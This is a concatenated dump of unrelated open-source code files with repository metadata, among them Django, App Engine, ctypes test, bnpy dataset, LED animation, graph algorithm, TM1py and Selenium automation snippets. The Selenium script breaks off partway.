""" Generates 'random' stats data by altering existing ones. """
factor = Decimal(random.random()) # Between 0.0 and 1.0, change every day.
print('Using existing consumption as base, multiplied by {}'.format(factor))
sleep(1) # Allow to abort when random number sucks.
print('Altering readings... (might take quite some time)')
DsmrReading.objects.all().order_by('-pk').update(
electricity_returned_1=models.F('electricity_delivered_1') * factor,
electricity_returned_2=models.F('electricity_delivered_2') * factor,
electricity_currently_returned=models.F('electricity_currently_delivered') * factor,
)
print('Altering electricity consumption... (might take quite some time as well)')
ElectricityConsumption.objects.all().update(
returned_1=models.F('delivered_1') * factor,
returned_2=models.F('delivered_2') * factor,
currently_returned=models.F('currently_delivered') * factor,
phase_currently_delivered_l1=models.F('currently_delivered') * factor, # Split.
phase_currently_delivered_l2=models.F('currently_delivered') * (1 - factor), # Remainder of split.
phase_currently_delivered_l3=0.005, # Weird constant, to keep it simple.
)
print('Altering hour statistics...')
HourStatistics.objects.all().update(
electricity1_returned=models.F('electricity1') * factor,
electricity2_returned=models.F('electricity2') * factor,
)
print('Altering day statistics...')
DayStatistics.objects.all().update(
electricity1_returned=models.F('electricity1') * factor,
electricity2_returned=models.F('electricity2') * factor,
)
print('Done!')
| [
"github@dennissiemensma.nl"
] | github@dennissiemensma.nl |
2edcd772211818912e2e90300d4d51ee3e1717dc | b84842cfa24fce5b1a8d093bdf45885b0f5ab434 | /configuration/appcaching/main.py | f45cc7805c1e496dbdcc9f2b7eef110336613c36 | [] | no_license | CodedQuen/Programming-Google-App-Engine | fc0f4572a60f3d91f08a15f2b2d19d71673d2de6 | bd3430b84db6477737a7332a358ed37a6ea36b23 | refs/heads/master | 2022-04-25T01:14:08.620872 | 2020-04-30T07:02:26 | 2020-04-30T07:02:26 | 260,136,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,873 | py | import datetime
import webapp2
# An app instance global.
app_counter = 0
class MainPage(webapp2.RequestHandler):
# A class variable.
cls_counter = 0
def __init__(self, *args, **kwargs):
super(MainPage, self).__init__(*args, **kwargs)
# A handler instance variable.
self.counter = 0
def incr_and_print_counter(self):
global app_counter
app_counter += 1
MainPage.cls_counter += 1
self.counter += 1
self.response.write('<p>App counter: %d</p>' % app_counter)
self.response.write('<p>Class counter: %d</p>' % MainPage.cls_counter)
self.response.write('<p>Object counter: %d</p>' % self.counter)
def get(self):
self.response.write('''
<p>This request handler accesses and modifies three counter variables: a module global, a class global, and an handler object member. When App Engine starts a new instance for an app, its memory begins empty. The first request handled by a request handler on the instance imports the <code>main</code> module, which initializes the module global and class global to zero (0). App Engine constructs a new instance of the <code>MainPage</code> class for each request, which initializes its instance member counter.</p>
<p>When you reload this page, the module and class globals may change depending on which instance handles your request, and how many previous requests the instance has handled. This number may fluctuate as new instances are started and requests are distributed across live instances. The object counter remains at 1, because each request gets its own handler object.</p>
''')
self.incr_and_print_counter()
self.response.write('<p>The time is: %s</p>' % str(datetime.datetime.now()))
app = webapp2.WSGIApplication([('/', MainPage)], debug=True)
| [
"noreply@github.com"
] | CodedQuen.noreply@github.com |
edf57439c76d8c1b3d592074a699e34cfd4a5ac4 | acd41dc7e684eb2e58b6bef2b3e86950b8064945 | /res/packages/scripts/scripts/common/Lib/ctypes/test/test_cfuncs.py | 1dd0e756e4abd4e16f874e05426342163b9b7036 | [] | no_license | webiumsk/WoT-0.9.18.0 | e07acd08b33bfe7c73c910f5cb2a054a58a9beea | 89979c1ad547f1a1bbb2189f5ee3b10685e9a216 | refs/heads/master | 2021-01-20T09:37:10.323406 | 2017-05-04T13:51:43 | 2017-05-04T13:51:43 | 90,268,530 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 7,850 | py | # 2017.05.04 15:31:23 Střední Evropa (letní čas)
# Embedded file name: scripts/common/Lib/ctypes/test/test_cfuncs.py
import unittest
from ctypes import *
import _ctypes_test
class CFunctions(unittest.TestCase):
_dll = CDLL(_ctypes_test.__file__)
def S(self):
return c_longlong.in_dll(self._dll, 'last_tf_arg_s').value
def U(self):
return c_ulonglong.in_dll(self._dll, 'last_tf_arg_u').value
def test_byte(self):
self._dll.tf_b.restype = c_byte
self._dll.tf_b.argtypes = (c_byte,)
self.assertEqual(self._dll.tf_b(-126), -42)
self.assertEqual(self.S(), -126)
def test_byte_plus(self):
self._dll.tf_bb.restype = c_byte
self._dll.tf_bb.argtypes = (c_byte, c_byte)
self.assertEqual(self._dll.tf_bb(0, -126), -42)
self.assertEqual(self.S(), -126)
def test_ubyte(self):
self._dll.tf_B.restype = c_ubyte
self._dll.tf_B.argtypes = (c_ubyte,)
self.assertEqual(self._dll.tf_B(255), 85)
self.assertEqual(self.U(), 255)
def test_ubyte_plus(self):
self._dll.tf_bB.restype = c_ubyte
self._dll.tf_bB.argtypes = (c_byte, c_ubyte)
self.assertEqual(self._dll.tf_bB(0, 255), 85)
self.assertEqual(self.U(), 255)
def test_short(self):
self._dll.tf_h.restype = c_short
self._dll.tf_h.argtypes = (c_short,)
self.assertEqual(self._dll.tf_h(-32766), -10922)
self.assertEqual(self.S(), -32766)
def test_short_plus(self):
self._dll.tf_bh.restype = c_short
self._dll.tf_bh.argtypes = (c_byte, c_short)
self.assertEqual(self._dll.tf_bh(0, -32766), -10922)
self.assertEqual(self.S(), -32766)
def test_ushort(self):
self._dll.tf_H.restype = c_ushort
self._dll.tf_H.argtypes = (c_ushort,)
self.assertEqual(self._dll.tf_H(65535), 21845)
self.assertEqual(self.U(), 65535)
def test_ushort_plus(self):
self._dll.tf_bH.restype = c_ushort
self._dll.tf_bH.argtypes = (c_byte, c_ushort)
self.assertEqual(self._dll.tf_bH(0, 65535), 21845)
self.assertEqual(self.U(), 65535)
def test_int(self):
self._dll.tf_i.restype = c_int
self._dll.tf_i.argtypes = (c_int,)
self.assertEqual(self._dll.tf_i(-2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_int_plus(self):
self._dll.tf_bi.restype = c_int
self._dll.tf_bi.argtypes = (c_byte, c_int)
self.assertEqual(self._dll.tf_bi(0, -2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_uint(self):
self._dll.tf_I.restype = c_uint
self._dll.tf_I.argtypes = (c_uint,)
self.assertEqual(self._dll.tf_I(4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_uint_plus(self):
self._dll.tf_bI.restype = c_uint
self._dll.tf_bI.argtypes = (c_byte, c_uint)
self.assertEqual(self._dll.tf_bI(0, 4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_long(self):
self._dll.tf_l.restype = c_long
self._dll.tf_l.argtypes = (c_long,)
self.assertEqual(self._dll.tf_l(-2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_long_plus(self):
self._dll.tf_bl.restype = c_long
self._dll.tf_bl.argtypes = (c_byte, c_long)
self.assertEqual(self._dll.tf_bl(0, -2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_ulong(self):
self._dll.tf_L.restype = c_ulong
self._dll.tf_L.argtypes = (c_ulong,)
self.assertEqual(self._dll.tf_L(4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_ulong_plus(self):
self._dll.tf_bL.restype = c_ulong
self._dll.tf_bL.argtypes = (c_char, c_ulong)
self.assertEqual(self._dll.tf_bL(' ', 4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_longlong(self):
self._dll.tf_q.restype = c_longlong
self._dll.tf_q.argtypes = (c_longlong,)
self.assertEqual(self._dll.tf_q(-9223372036854775806L), -3074457345618258602L)
self.assertEqual(self.S(), -9223372036854775806L)
def test_longlong_plus(self):
self._dll.tf_bq.restype = c_longlong
self._dll.tf_bq.argtypes = (c_byte, c_longlong)
self.assertEqual(self._dll.tf_bq(0, -9223372036854775806L), -3074457345618258602L)
self.assertEqual(self.S(), -9223372036854775806L)
def test_ulonglong(self):
self._dll.tf_Q.restype = c_ulonglong
self._dll.tf_Q.argtypes = (c_ulonglong,)
self.assertEqual(self._dll.tf_Q(18446744073709551615L), 6148914691236517205L)
self.assertEqual(self.U(), 18446744073709551615L)
def test_ulonglong_plus(self):
self._dll.tf_bQ.restype = c_ulonglong
self._dll.tf_bQ.argtypes = (c_byte, c_ulonglong)
self.assertEqual(self._dll.tf_bQ(0, 18446744073709551615L), 6148914691236517205L)
self.assertEqual(self.U(), 18446744073709551615L)
def test_float(self):
self._dll.tf_f.restype = c_float
self._dll.tf_f.argtypes = (c_float,)
self.assertEqual(self._dll.tf_f(-42.0), -14.0)
self.assertEqual(self.S(), -42)
def test_float_plus(self):
self._dll.tf_bf.restype = c_float
self._dll.tf_bf.argtypes = (c_byte, c_float)
self.assertEqual(self._dll.tf_bf(0, -42.0), -14.0)
self.assertEqual(self.S(), -42)
def test_double(self):
self._dll.tf_d.restype = c_double
self._dll.tf_d.argtypes = (c_double,)
self.assertEqual(self._dll.tf_d(42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_double_plus(self):
self._dll.tf_bd.restype = c_double
self._dll.tf_bd.argtypes = (c_byte, c_double)
self.assertEqual(self._dll.tf_bd(0, 42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_longdouble(self):
self._dll.tf_D.restype = c_longdouble
self._dll.tf_D.argtypes = (c_longdouble,)
self.assertEqual(self._dll.tf_D(42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_longdouble_plus(self):
self._dll.tf_bD.restype = c_longdouble
self._dll.tf_bD.argtypes = (c_byte, c_longdouble)
self.assertEqual(self._dll.tf_bD(0, 42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_callwithresult(self):
def process_result(result):
return result * 2
self._dll.tf_i.restype = process_result
self._dll.tf_i.argtypes = (c_int,)
self.assertEqual(self._dll.tf_i(42), 28)
self.assertEqual(self.S(), 42)
self.assertEqual(self._dll.tf_i(-42), -28)
self.assertEqual(self.S(), -42)
def test_void(self):
self._dll.tv_i.restype = None
self._dll.tv_i.argtypes = (c_int,)
self.assertEqual(self._dll.tv_i(42), None)
self.assertEqual(self.S(), 42)
self.assertEqual(self._dll.tv_i(-42), None)
self.assertEqual(self.S(), -42)
return
try:
WinDLL
except NameError:
pass
else:
class stdcall_dll(WinDLL):
def __getattr__(self, name):
if name[:2] == '__' and name[-2:] == '__':
raise AttributeError(name)
func = self._FuncPtr(('s_' + name, self))
setattr(self, name, func)
return func
class stdcallCFunctions(CFunctions):
_dll = stdcall_dll(_ctypes_test.__file__)
if __name__ == '__main__':
unittest.main()
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\common\Lib\ctypes\test\test_cfuncs.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:31:23 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
4bf4f653d1613c7c86df9e27f28d4e409cace30d | 5006a6965c21e5b828300eedf907eb55ec5b8b27 | /bnpy/datasets/zzz_unsupported/SeqOfBinBars9x9.py | 27e0894613c7097a982c3c7cb0276837370c30f6 | [
"BSD-3-Clause"
] | permissive | birlrobotics/bnpy | 1804d0fed9c3db4c270f4cd6616b30323326f1ec | 8f297d8f3e4a56088d7755134c329f63a550be9e | refs/heads/master | 2021-07-09T14:36:31.203450 | 2018-02-09T07:16:41 | 2018-02-09T07:16:41 | 96,383,050 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,831 | py | '''
SeqOfBinBars9x9.py
Binary toy bars data, with a 9x9 grid,
so each observation is a vector of size 81.
There are K=20 true topics
* one common background topic (with prob of 0.05 for all pixels)
* one rare foreground topic (with prob of 0.90 for all pixels)
* 18 bar topics, one for each row/col of the grid.
The basic idea is that the background topic is by far most common.
It takes over 50% of all timesteps.
The horizontal bars and the vertical bars form coherent groups,
where we transition between each bar (1-9) in a standard step-by-step way.
The rare foreground topic simulates the rare "artificial" phenomena
reported by some authors, of unusual all-marks-on bursts in chr data.
'''
import os
import sys
import scipy.io
import numpy as np
from bnpy.data import GroupXData
from bnpy.util import as1D
K = 20 # Number of topics
D = 81 # Vocabulary Size
bgStateID = 18
fgStateID = 19
Defaults = dict()
Defaults['nDocTotal'] = 50
Defaults['T'] = 10000
Defaults['bgProb'] = 0.05
Defaults['fgProb'] = 0.90
Defaults['seed'] = 8675309
Defaults['maxTConsec'] = Defaults['T'] / 5.0
def get_data(**kwargs):
''' Create dataset as bnpy DataObj object.
'''
Data = generateDataset(**kwargs)
Data.name = 'SeqOfBinBars9x9'
Data.summary = 'Binary Bar Sequences with %d true topics.' % (K)
return Data
def makePi(stickyProb=0.95, extraStickyProb=0.9999,
**kwargs):
''' Make phi matrix that defines probability of each pixel.
'''
pi = np.zeros((K, K))
# Horizontal bars
for k in xrange(9):
pi[k, k] = stickyProb
if k == 8:
pi[k, bgStateID] = 1 - stickyProb
else:
pi[k, (k + 1) % 9] = 1 - stickyProb
# Vertical bars
for k in xrange(9, 18):
pi[k, k] = stickyProb
if k == 17:
pi[k, bgStateID] = 1 - stickyProb
else:
pi[k, 9 + (k + 1) % 9] = 1 - stickyProb
pi[bgStateID, :] = 0.0
pi[bgStateID, bgStateID] = extraStickyProb
pi[bgStateID, 0] = 5.0 / 12 * (1 - extraStickyProb)
pi[bgStateID, 9] = 5.0 / 12 * (1 - extraStickyProb)
pi[bgStateID, fgStateID] = 2.0 / 12 * (1 - extraStickyProb)
mstickyProb = 0.5 * (stickyProb + extraStickyProb)
pi[fgStateID, :] = 0.0
pi[fgStateID, fgStateID] = mstickyProb
pi[fgStateID, bgStateID] = 1 - mstickyProb
assert np.allclose(1.0, np.sum(pi, 1))
return pi
def makePhi(fgProb=0.75, bgProb=0.05, **kwargs):
''' Make phi matrix that defines probability of each pixel.
'''
phi = bgProb * np.ones((K, np.sqrt(D), np.sqrt(D)))
for k in xrange(18):
if k < 9:
rowID = k
# Horizontal bars
phi[k, rowID, :] = fgProb
else:
colID = k - 9
phi[k, :, colID] = fgProb
phi[-2, :, :] = bgProb
phi[-1, :, :] = fgProb
phi = np.reshape(phi, (K, D))
return phi
def generateDataset(**kwargs):
for key in Defaults:
if key not in kwargs:
kwargs[key] = Defaults[key]
phi = makePhi(**kwargs)
transPi = makePi(**kwargs)
PRNG = np.random.RandomState(kwargs['seed'])
nSeq = kwargs['nDocTotal']
T_in = kwargs['T']
if isinstance(T_in, str):
Tvals = [int(T) for T in T_in.split(',')]
else:
Tvals = [T_in]
if len(Tvals) == 1:
seqLens = Tvals[0] * np.ones(nSeq, dtype=np.int32)
elif len(Tvals) < nSeq:
seqLens = np.tile(Tvals, nSeq)[:nSeq]
elif len(Tvals) >= nSeq:
seqLens = np.asarray(Tvals, dtype=np.int32)[:nSeq]
doc_range = np.hstack([0, np.cumsum(seqLens)])
N = doc_range[-1]
allX = np.zeros((N, D))
allZ = np.zeros(N, dtype=np.int32)
startStates = [bgStateID, fgStateID]
states0toKm1 = np.arange(K)
# Each iteration generates one time-series/sequence
# with starting state deterministically rotating among all states
for i in xrange(nSeq):
start = doc_range[i]
stop = doc_range[i + 1]
T = stop - start
Z = np.zeros(T, dtype=np.int32)
X = np.zeros((T, D))
nConsec = 0
Z[0] = startStates[i % len(startStates)]
X[0] = PRNG.rand(D) < phi[Z[0]]
for t in xrange(1, T):
if nConsec > kwargs['maxTConsec']:
# Force transition if we've gone on too long
transPi_t = transPi[Z[t - 1]].copy()
transPi_t[Z[t - 1]] = 0
transPi_t /= transPi_t.sum()
else:
transPi_t = transPi[Z[t - 1]]
Z[t] = PRNG.choice(states0toKm1, p=transPi_t)
X[t] = PRNG.rand(D) < phi[Z[t]]
if Z[t] == Z[t - 1]:
nConsec += 1
else:
nConsec = 0
allZ[start:stop] = Z
allX[start:stop] = X
TrueParams = dict()
TrueParams['beta'] = np.mean(transPi, axis=0)
TrueParams['phi'] = phi
TrueParams['Z'] = allZ
TrueParams['K'] = K
return GroupXData(allX, doc_range=doc_range, TrueParams=TrueParams)
DefaultOutputDir = os.path.join(
os.environ['XHMMROOT'], 'datasets', 'SeqOfBinBars9x9')
def saveDatasetToDisk(outputdir=DefaultOutputDir):
''' Save dataset to disk for scalable experiments.
'''
Data = get_data()
for k in xrange(K):
print 'N[%d] = %d' % (k, np.sum(Data.TrueParams['Z'] == k))
# Save it as batches
nDocPerBatch = 2
nBatch = Data.nDocTotal // nDocPerBatch
for batchID in xrange(nBatch):
mask = np.arange(batchID * nDocPerBatch, (batchID + 1) * nDocPerBatch)
Dbatch = Data.select_subset_by_mask(mask, doTrackTruth=1)
outmatpath = os.path.join(
outputdir,
'batches/batch%02d.mat' %
(batchID))
Dbatch.save_to_mat(outmatpath)
with open(os.path.join(outputdir, 'batches/Info.conf'), 'w') as f:
f.write('datasetName = SeqOfBinBars9x9\n')
f.write('nBatchTotal = %d\n' % (nBatch))
f.write('nDocTotal = %d\n' % (Data.nDocTotal))
Dsmall = Data.select_subset_by_mask([0, 1], doTrackTruth=1)
Dsmall.save_to_mat(os.path.join(outputdir, 'HMMdataset.mat'))
if __name__ == '__main__':
import scipy.io
import bnpy.viz.BernViz as BernViz
# saveDatasetToDisk()
# BernViz.plotCompsAsSquareImages(Data.TrueParams['phi'])
Data = get_data(nDocTotal=2)
pylab = BernViz.pylab
pylab.subplots(nrows=1, ncols=Data.nDoc)
for d in xrange(2):
start = Data.doc_range[d]
stop = Data.doc_range[d + 1]
pylab.subplot(1, Data.nDoc, d + 1)
Xim = Data.X[start:stop]
pylab.imshow(Xim,
interpolation='nearest', cmap='bone',
aspect=Xim.shape[1] / float(Xim.shape[0]),
)
pylab.ylim([np.minimum(stop - start, 5000), 0])
pylab.show(block=True)
| [
"hongminwu0120@gmail.com"
] | hongminwu0120@gmail.com |
8a51add4f7cac897e5689c2db9965056e5429db9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02684/s383863332.py | cee048d87cd74a0e9eb30d0721462d9b668e3bb4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | N, K = map(int, input().split())
A = list(map(int, input().split()))
visited = [0 for _ in range(N)]
first_visit = [0 for _ in range(N)]
now = 0
flag = True
for i in range(10 ** 5 * 5):
if first_visit[now] == 0:
first_visit[now] = i
visited[A[now] - 1] += 1
now = A[now] - 1
if i == K - 1:
print(now + 1)
flag = False
break
if flag:
num = 0
for i in range(N):
if visited[i] > 2:
num += 1
for i in range(N):
if visited[i] >= 2:
if K % num == first_visit[i] % num:
print(i + 1)
break
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b31f8616e5f36658a3e7687d1080014d2b0a7da7 | 0c39d88b4cdd35c96be02573f804196721d88f52 | /mentha/tests/persistent_settings.py | 818c47a931bc6c7a1b7dd1227006db39ec15c0fa | [
"MIT"
] | permissive | ateoto/django-mentha | 7909e5ad989481fa57aa3336bcb98380c6e9e762 | 2b9aeba1f9a33ee76dca2e1f9436e964be2c2325 | refs/heads/master | 2016-09-06T13:59:49.994441 | 2014-06-10T23:45:30 | 2014-06-10T23:45:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from .test_settings import * # NOQA
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite',
}
} | [
"mattmccants@gmail.com"
] | mattmccants@gmail.com |
16ea3f9021e49cc8cb94b0503223dd1a3ede9237 | 32a7a7663ce0c94dc7c6465e1a4b819145d17e87 | /BiblioPixelAnimations/matrix/MathFunc.py | 997fdced226c3f7c7b4c30d62bc9a1a0e66c1415 | [
"MIT"
] | permissive | CriticalTechGuy/BiblioPixelAnimations | 04d08e1d41f374b63aa90956b3aeda2db6484d02 | 2a3a1671f289b21d7da316df1b5ca54d7f95a3b1 | refs/heads/master | 2020-03-26T06:24:12.460928 | 2018-04-19T10:17:21 | 2018-04-19T11:36:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,300 | py | from bibliopixel.animation import BaseMatrixAnim
import bibliopixel.colors as colors
import random
import math
def hue_fade(a, b, val):
if a > b:
b = b + 360
return (a + ((b - a) * val)) % 360
class MathFunc(BaseMatrixAnim):
funcs = [
lambda x, y, s: x + (x * y) + s,
lambda x, y, s: x * s + (x * y),
lambda x, y, s: x * y * s + s,
lambda x, y, s: x * y - math.log(s + 1) + s,
lambda x, y, s: math.cos(0.5 * x) * y + s,
lambda x, y, s: math.cos(x * y) * y + s,
lambda x, y, s: math.tan(y) * math.cos(x) + s,
lambda x, y, s: math.sin(y) + x * s,
lambda x, y, s: math.sin(x) + y * s,
lambda x, y, s: math.sin(x * y) + y * x + s,
lambda x, y, s: x * x - y * y + s,
lambda x, y, s: (x * y - y * y) + s,
lambda x, y, s: (x * y - y * y) % (s + 1),
lambda x, y, s: (y * y + x * x) + s,
lambda x, y, s: x * y * 2 - y * y * 2 + s,
lambda x, y, s: (x / (y + 1)) + (y * y) + s,
lambda x, y, s: ((x * x) / 2 * (y + 1)) + s,
lambda x, y, s: x * y * (x + y) + s,
lambda x, y, s: x * y * (s / (x + 1)),
lambda x, y, s: (x * x * x) - (y * y * 2) + s,
lambda x, y, s: x * 12 - y * 4 + s,
lambda x, y, s: math.log10(x + 1) * (y * 2) + s
]
def __init__(self, layout, frames_per=300, func=0, rand=True, fade_frames=30):
super().__init__(layout)
self.start_func = func
self.frames_per = frames_per
self.rand = rand
self.fade_frames = fade_frames
self.fade_step = 1.0 / fade_frames if fade_frames else 0.0
def pre_run(self):
self._step = 0
self.count = 0
self.fade_count = 0
self.cur_func = random.choice(range(len(self.funcs))) if self.rand else self.start_func
self.next_func = None
def call_func(self, func, x, y, s):
return abs(int(self.funcs[func](x, y, s))) % 360
def step(self, amt=1):
self.layout.all_off()
for y in range(self.height):
for x in range(self.width):
h = self.call_func(self.cur_func, x, y, self._step)
if self.next_func:
h_next = self.call_func(self.next_func, x, y, self._step)
h = hue_fade(h, h_next, self.fade_step * self.fade_count)
c = colors.hue2rgb_360(h)
self.layout.set(x, y, c)
if self.next_func:
self.fade_count += 1
if self.fade_count >= self.fade_frames:
self.cur_func = self.next_func
self.next_func = None
self.fade_count = 0
self.count = 0
else:
self.count += 1
if not self.next_func and self.frames_per and self.count >= self.frames_per:
if self.rand:
self.next_func = random.choice(range(len(self.funcs)))
else:
self.next_func = self.cur_func + 1
if self.next_func >= len(self.funcs):
self.next_func = 0
self.state = 2
self.count = 0
if not self.fade_frames:
self.cur_func = self.next_func
self.next_func = None
self._step += amt
| [
"adammhaile@gmail.com"
] | adammhaile@gmail.com |
35b54fd11d79356160dff0313c1e493c06a17499 | a373cdb4107e099ce31eaa0f7620292c6154d860 | /Metadata/dim_hierarchy_get_default_member.py | 50ba4c0431c1f79885b4e68a9fe079d3313bcfa3 | [
"MIT"
] | permissive | jamiros/tm1py-samples | 2a562337baebc2dcbbefd76d64c4c8f20e98810a | a398ae8744dcf19b5aa045a87d878bf18c903cc6 | refs/heads/master | 2022-02-23T14:42:22.404148 | 2019-10-01T21:32:10 | 2019-10-01T21:33:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | """
When a dimension of a cube is not explicitly referenced in an MDX Query,
TM1 will implicitly use the DefaultMember for the missing dimension.
If no DefaultMember is defined in TM1, it will use the element with index 1.
You can use TM1py to query and update the default member for a Hierarchy
"""
import configparser
from TM1py.Services import TM1Service
config = configparser.ConfigParser()
config.read(r'..\config.ini')
with TM1Service(**config['tm1srv02']) as tm1:
current_default_member = tm1.dimensions.hierarchies.get_default_member(
dimension_name="Date",
hierarchy_name="Date")
print("Current default member for dimension Date: " + current_default_member)
| [
"MariusWirtz2@gmail.com"
] | MariusWirtz2@gmail.com |
c6861e3d4dca9db411a177f6608f52cfa4d48142 | aac418419c2ef4d10c5c4ceb607d3d8329a5f395 | /Algorithms/Graph/Topological_Sorting.py | a67d9eb485275425187fa875ad930ae3a719ff68 | [] | no_license | sudhirshahu51/projects | bb13395227355ff84933b6d3a0f158ee42bcdceb | b2d8331d14d2163b20535368a60c81f6c8bc2c8f | refs/heads/master | 2021-01-01T17:09:18.654060 | 2017-04-24T10:46:15 | 2017-04-24T10:46:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,342 | py | # To implement Topological Sorting for directed graph
# Topological Sorting: if there is path from u to v then u comes before v in ordering
class Vertex: # Class of vertex
def __init__(self, key):
self.id = key
self.connected = {} # dictionary of all the connected vertices with tht vertice
self.in_degree = 0
self.status = 'tmp'
def add_neighbor(self, nbr, weight=0): # adding a adjacent neighbour where nbr is vertex
self.connected[nbr] = weight
def __str__(self):
return str(self.id) + 'connected to' + str([x.id for x in self.connected])
def get_connections(self): # Get all the adjacent vertices
return self.connected.keys()
def get_id(self):
return self.id
def get_weight(self, nbr):
return self.connected[nbr]
class Graph:
def __init__(self):
self.vertices_list = {}
self.vertices_num = 0
def add_vertex(self, key): # Add a vertex in the graph
self.vertices_num += 1
new_vertex = Vertex(key)
self.vertices_list[key] = new_vertex
return new_vertex
def get_vertex(self, key): # To return the vertex with the specified key
if key in self.vertices_list:
return self.vertices_list[key]
else:
return None
def __contains__(self, items): # Returns all the vertice by calling for i in g
return items in self.vertices_list
def add_edge(self, v1, v2, weight=1):
if v1 not in self.vertices_list:
self.add_vertex(v1)
if v2 not in self.vertices_list:
self.add_vertex(v2)
self.vertices_list[v1].add_neighbor(self.vertices_list[v2], weight)
g.get_vertex(v2).in_degree += 1
def get_vertices(self):
return self.vertices_list.keys()
def __iter__(self):
return iter(self.vertices_list.values())
class Queue:
def __init__(self):
self.items = []
def __contains__(self, item):
return item in self.items
def is_empty(self):
return self.items == []
def enqueue(self, data):
self.items.insert(0, data)
def de_queue(self):
return self.items.pop()
def size(self):
return len(self.items)
def front(self):
return self.items[-1]
def rare(self):
return self.items[0]
def topological(g):
if not isinstance(g, Graph):
return
q = Queue()
order = []
lst = list(g.vertices_list.keys())
while len(lst) != 0:
for x in lst:
if g.get_vertex(x).in_degree == 0:
q.enqueue(x)
lst.remove(x)
tmp = q.de_queue()
order.append(g.get_vertex(tmp))
for x in g.get_vertex(tmp).get_connections():
x.in_degree -= 1
return order
if __name__ == '__main__':
g = Graph()
for i in range(7):
g.add_vertex(i)
g.add_edge(0, 5)
g.add_edge(0, 1)
g.add_edge(1, 5)
g.add_edge(1, 4)
g.add_edge(2, 3)
g.add_edge(2, 1)
g.add_edge(3, 1)
g.add_edge(3, 4)
g.add_edge(4, 5)
g.add_edge(6, 5)
g.add_edge(6, 4)
print(topological(g)) | [
"deveshaggrawal19@gmail.com"
] | deveshaggrawal19@gmail.com |
af55e087aa75c1d2e0da2e2878b229a089ea5ed0 | 32ddd90c9f2b2037cb7fd0a338deefcf16e5d17d | /python/tree/sorted_array_to_bst.py | f060c74878b80931d55e37ccbd04bc5372c588a4 | [] | no_license | btoll/howto-algorithm | 2a671779a4abb279e2a55461c8cfd7094770b42a | 57ed65d97d951e3746f71190fb57813b519a1aa5 | refs/heads/master | 2023-02-20T17:17:38.600806 | 2023-02-10T05:16:22 | 2023-02-10T05:16:22 | 182,487,529 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | from random import randint
import ipdb
class TreeNode:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
def sorted_array_to_bst(nodes, left, right):
if left > right:
return None
# Choose left middle node as a root.
mid = (left + right) // 2
# # If odd, add 1. Choose right middle node as a root.
# if (left + right) % 2:
# mid += 1
# Choose random middle node as a root.
# if (left + right) % 2:
# mid += randint(0, 1)
root = TreeNode(nodes[mid])
root.left = sorted_array_to_bst(nodes, left, mid - 1)
root.right = sorted_array_to_bst(nodes, mid + 1, right)
return root
nodes = [-10, -3, 0, 5, 9]
root = sorted_array_to_bst(nodes, 0, len(nodes) - 1)
| [
"benjam72@yahoo.com"
] | benjam72@yahoo.com |
4e08bf6ece5a6c2a9ade93b244d59c3220a2ce12 | df3eb06af5151b0a07ebdf3723aedd3a6cd98f5e | /day3/dengLuTest.py | 5e9494a4b3fd28ff603cf84b6c9ee04351872c1a | [] | no_license | zhile0624/selenium7th | fa4d8e1a2bdeda18c0170de09144fc052ce71d32 | 6731ce2d786625ba0945739ec2c3109b04cd1441 | refs/heads/master | 2020-03-21T10:42:38.832843 | 2018-06-24T08:50:46 | 2018-06-24T08:50:46 | 138,466,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,375 | py | # selenium执行javascript中的两个关键字: return(返回值) 和 arguments(参数)
import time
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
driver = webdriver.Chrome()
driver.get("http://localhost")
driver.implicitly_wait(20)
# 点击"登录"链接
# 用javascript的方法找登录链接的代码:
# document.getElementsByClassName("site-nav-right fr")[0].childNodes[1]
# 用selenium的方法找登录链接的代码:
# driver.find_element_by_link_text("登录")
# 通常,用selenium的方法找元素比javascript更容易
# 虽然selenium 不支持remoceAttribute的javascript方法
# 但是selenium找到登录链接和javascript找到的是同一个元素
# 我们可不可以把selenium找到的这个元素,传入到javascript方法里,代替原来的javascript定位
login_link = driver.find_element_by_link_text("登录")
# arguments参数的复数形式, [0]表示第一个参数,指的就是js后面的login_link
# 所以下面这句代码,相当于把driver.find_element_by_link_text("登录")带入到javascript语句中
# 变成了driver.find_element_by_link_text("登录").removeAttribute('target')
